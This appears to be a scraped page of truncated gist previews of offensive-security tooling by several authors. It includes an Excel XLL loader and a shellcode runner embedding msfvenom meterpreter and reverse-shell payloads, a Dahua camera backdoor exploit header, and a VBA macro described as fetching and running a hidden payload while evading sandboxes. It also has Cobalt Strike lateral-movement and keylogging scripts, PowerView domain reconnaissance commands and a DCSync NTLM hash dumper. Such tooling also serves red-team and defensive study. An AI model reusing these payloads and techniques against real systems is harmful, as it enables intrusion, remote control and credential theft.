Arno0x

// Compile with: cl.exe x86_meterpreter_reverse_http.c /LD /o x86_meterpreter_reverse_http.xll
#include <Windows.h>

__declspec(dllexport) void __cdecl xlAutoOpen(void); 

DWORD WINAPI ThreadFunction(LPVOID lpParameter)
{
	// Payload obtained via "msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai -f c"
	unsigned char b[] = 
	"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"

Arno0x

// Compile with: cl.exe shellcode_execute.c
//
// Author: Arno0x0x, Twitter: @Arno0x0x

#include <Windows.h>

int main()
{
	// Payload obtained with "msfvenom -a x86 -p windows/shell/reverse_tcp LHOST=192.168.52.134"
	unsigned char b[] = 

avelardi

#!/usr/bin/python2.7
#
# Dahua backdoor Generation 2 and 3
# Author: bashis <mcw noemail eu> March 2017
#
# Credentials: No credentials needed (Anonymous)
#Jacked from git history
#

import string

Arno0x

' Author Arno0x0x - https://twitter.com/Arno0x0x
'
' This macro downloads an XML bibliography source file.
' The <Title> element of this XML file actually contains a base64 encoded MSOffice template
' which itself contains another malicious macro much more detectable (meterpreter for instance).
' 
' The base64 encoded file (payload) is extracted from the XML file, decoded and saved on the temporary folder
' Only then, an new Office Word object is instantiated to load this Office Template and run a specific macro from it.
'
' This macro makes use of very basic tricks to evade potential sandbox analysis, such as popup windows, check of local printers

001SPARTaN

# Lateral movement techniques based on research by enigma0x3 (Matt Nelson)
# https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
# https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
# Beacon implementation based on comexec.cna by Raphael Mudge
# https://gist.github.com/rsmudge/8b2f699ea212c09201a5cb65650c6fa2

# Register alias
beacon_command_register ("dcom_shellexecute", "Lateral movement with DCOM (ShellExecute)",
                        "Usage: dcom_shellexecute [target] [listener]\n\n" .
                        "Spawn new Beacon on a target via DCOM ShellExecute Object.");

rsmudge

# convert comma separated keystroke values into a string.
sub toString {
	local('@temp');
	@temp = split(",", $1);
	shift(@temp);

	return join("", map({
		return chr(parseNumber($1, 16, 10)); 
	}, @temp));
}

rsmudge

# getexplorerpid($bid, &callback);
sub getanypid {
  bps($1, lambda({
    local('$pid $name $entry');
    foreach $entry (split("\n", $2)) {
      ($name, $pid) = split("\\s+", $entry);
      if ($name eq $proc) {
        # $1 is our Beacon ID, $pid is the PID of $proc
        [$callback: $1, $proc, $pid];
      }

vysecurity

using System;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;

//Add For PowerShell Invocation
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;

HarmJ0y

# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/)
#   has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993

# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>

# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GoupName <GROUP> -Recurse

# get the effective set of users who can administer a server

monoxgas

function Invoke-DCSync
{
<#
.SYNOPSIS

Uses dcsync from mimikatz to collect NTLM hashes from the domain.

Author: @monoxgas
Improved by: @harmj0y